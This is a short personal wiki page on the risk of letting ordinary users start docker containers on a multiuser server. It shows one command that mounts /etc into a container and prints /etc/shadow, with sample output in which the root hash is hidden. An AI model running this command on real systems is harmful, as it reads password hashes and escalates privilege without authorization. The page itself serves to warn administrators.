Docker security

From Mike's wiki
Revision as of 10:49, 4 January 2023 by Mike (talk | contribs) (Security issues using docker in a multiuser environment.)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

Docker is actually a major security risk on a system where you allow users to start and stop docker containers. A docker container per default uses root as the running user, and thus starting a docker container using some trickeries as a normal user, will compromise system security..

For instance if I wish to compromise system passwords, I can simply do 

mike@Server.ttsh.dk:~/docker$ docker run --rm  -v /etc:/mnt/etc/   httpd:2.4 cat /mnt/etc/shadow
root:(obfuscated by author)::0:99999:7:::
bin:*:18358:0:99999:7:::
daemon:*:18358:0:99999:7:::
Retrieved from "https://wiki.ttsh.dk/index.php?title=Docker_security&oldid=4"